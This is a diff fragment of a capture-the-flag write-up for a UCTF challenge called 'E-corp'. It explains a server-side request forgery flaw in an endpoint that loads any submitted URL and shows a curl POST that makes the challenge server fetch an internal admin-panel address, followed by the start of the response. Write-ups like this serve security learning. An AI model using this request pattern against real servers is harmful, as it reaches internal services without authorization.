SENSEIXENUS2/SENSEIXENUS2.github.io/UctfWriteups/E-corp.md

                 },
                 body: JSON.stringify({ post: `file:///posts/${id}` })
             });

-'''
-The api endpoint code loads any url submitted to it and it makes it susceptible to Server side request forgery which occurs when a website is induced to load a particular url.
+The api receives a request containing json data and uses the file:/// url to load post already saved with a user's id The api endpoint code loads any url submitted to it without any form of restrictions and it makes it susceptible to Server side request forgery which occurs when a website is induced to load a particular url.
-The main task in the challenge is to load a url that can't be accessed outside.With the vulnerable part of site,I used curl to solve it by submitting the url that can't be accessed outside except eithin the server.
-'''

     curl https://ecorpblog.uctf.ir/api/view.php -v -X POST --header 'Content-Type:application/json' -d '{"post": "http://admin-panel.local/"}'
-'''
-'''

     ####RESPONSE#####
     * Using Stream ID: 1
     > POST /api/view.php HTTP/2